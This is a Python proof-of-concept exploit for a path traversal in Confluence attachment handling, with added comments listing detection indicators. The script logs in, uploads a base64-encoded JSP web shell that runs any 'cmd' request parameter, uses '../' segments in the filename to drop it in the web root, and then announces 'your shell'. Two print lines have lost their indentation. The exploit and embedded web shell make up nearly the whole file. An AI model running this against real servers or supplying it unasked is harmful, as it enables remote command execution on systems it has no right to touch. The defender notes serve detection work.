#!/usr/bin/python3.6
import requests
from bs4 import BeautifulSoup
import base64
# Proof-of-concept for a path traversal in Confluence attachment handling:
# an authenticated user uploads an attachment whose `filename` contains `../`
# segments, then requests the "download all attachments" action for the same
# draft. The script reports success if a JSP file ends up in the web root.
#
# Defender summary of what to look for (all strings below appear in this file):
#   * POST to `plugins/drag-and-drop/upload.action` whose `filename` query
#     parameter contains `../` (raw or URL-encoded).
#   * A following GET to `pages/downloadallattachments.action` for that page id.
#   * A new `.jsp` under the install directory, here
#     `/opt/atlassian/confluence/confluence/`.
#   * Requests to an unexpected top-level `.jsp` carrying a `cmd` parameter.
# NOTE(review): the fixed product versions are not stated on this page; take
# them from the vendor advisory rather than from this script.

# Base URL of the instance under test; a loopback lab address, plain HTTP.
url = 'http://127.0.0.1:8090/'
# Login form fields. The flow needs a valid account; which permissions are
# required beyond being able to create a page is not shown here.
values = {'os_username':'admin',
'os_password':'password',
'login':'Log+in',
'os_destination':''}
# Browser-like headers sent with the login, upload and download requests,
# so the user-agent alone will not distinguish this traffic in access logs.
headers = {
'accept': '*/*',
'user-agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'
}
# Base64 of a small JSP page. Decoded, it renders a form with a `cmd` field and
# passes that request parameter to Runtime.getRuntime().exec(), printing the
# process output. The decoded text (e.g. the `Runtime.getRuntime().exec(request.getParameter`
# fragment) is a usable content signature when sweeping a web root for dropped files.
jspshell = 'PCVAIHBhZ2UKaW1wb3J0PSJqYXZhLnV0aWwuKixqYXZhLmlvLioiJT4KPCUKJT4KPEhUTUw+CjxCT0RZPgo8SDM+SlNQIFNIRUxMPC9IMz4KPEZPUk0gTUVUSE9EPSJHRVQiIE5BTUU9Im15Zm9ybSIKQUNUSU9OPSIiPgo8SU5QVVQgVFlQRT0idGV4dCIgTkFNRT0iY21kIj4KPElOUFVUIFRZUEU9InN1Ym1pdCIgVkFMVUU9IkV4ZWN1dGUiPgo8L0ZPUk0+CjxQUkU+CjwlCmlmIChyZXF1ZXN0LmdldFBhcmFtZXRlcigiY21kIikgIT0gbnVsbCkgewpvdXQucHJpbnRsbigiQ29tbWFuZDogIiArCnJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSArICI8QlI+Iik7ClByb2Nlc3MgcCA9ClJ1bnRpbWUuZ2V0UnVudGltZSgpLmV4ZWMocmVxdWVzdC5nZXRQYXJhbWV0ZXIoImNtZCIpKTsKT3V0cHV0U3RyZWFtIG9zID0gcC5nZXRPdXRwdXRTdHJlYW0oKTsKSW5wdXRTdHJlYW0gaW4gPSBwLmdldElucHV0U3RyZWFtKCk7CkRhdGFJbnB1dFN0cmVhbSBkaXMgPSBuZXcgRGF0YUlucHV0U3RyZWFtKGluKTsKU3RyaW5nIGRpc3IgPSBkaXMucmVhZExpbmUoKTsKd2hpbGUgKCBkaXNyICE9IG51bGwgKSB7Cm91dC5wcmludGxuKGRpc3IpOwpkaXNyID0gZGlzLnJlYWRMaW5lKCk7Cn0KfQolPgo8L1BSRT4KPC9CT0RZPgo8L0hUTUw+Cg=='
# One session object carries the login cookie through every later request.
session = requests.Session()
# Step 1: authenticate. The response page is parsed only for the XSRF token.
login = session.post(url + 'dologin.action', headers=headers, data=values)
soup = BeautifulSoup(login.text, 'html.parser')
# select_one() returns None when the meta tag is absent (e.g. failed login), so
# this line raises AttributeError in that case; there is no explicit check.
csrf_token = soup.select_one('meta[name="atlassian-token"]').get('content',None)
# Step 2: open the create-page form to obtain a draft id to attach to.
createpage = session.get(url + 'pages/createpage.action')
soup = BeautifulSoup(createpage.text, 'html.parser')
draft_id = soup.select_one('meta[name="ajs-draft-id"]').get('content',None)
# Step 3: upload the decoded JSP as an attachment to the draft. The security-relevant
# input is `filename`: it is client-supplied and carries `../` segments plus an
# absolute install path. A server-side fix has to reject or canonicalise path
# separators in attachment names before any file-system use. The declared
# mimeType is text/plain, so content-type filtering would not flag the upload.
attach = session.post(url + 'plugins/drag-and-drop/upload.action?draftId=' + draft_id + '&filename=../../../../../../opt/atlassian/confluence/confluence/shell.jsp&size=637&mimeType=text%2fplain&atl_token=' + csrf_token, headers=headers,data=base64.b64decode(jspshell))
# Step 4: request the "download all attachments" action for the same draft.
# NOTE(review): presumably the server writes each attachment to disk under its
# stored filename while building the archive, which is where the traversal takes
# effect; that server-side behaviour is inferred, not visible in this script.
downloadallattachments = session.get(url + 'pages/downloadallattachments.action?pageId=' + draft_id, headers=headers)
# Only the HTTP status of the download request is checked; the script never
# verifies that the file was written or that `shell.jsp` is reachable.
# NOTE(review): the two print calls appear at column 0 on this page; their
# indentation under if/else looks to have been lost when the page was rendered.
if downloadallattachments.status_code == 200:
print('Success! Go to ' + url + 'shell.jsp for your shell!')
else:
print('Something went wrong. Blame python.')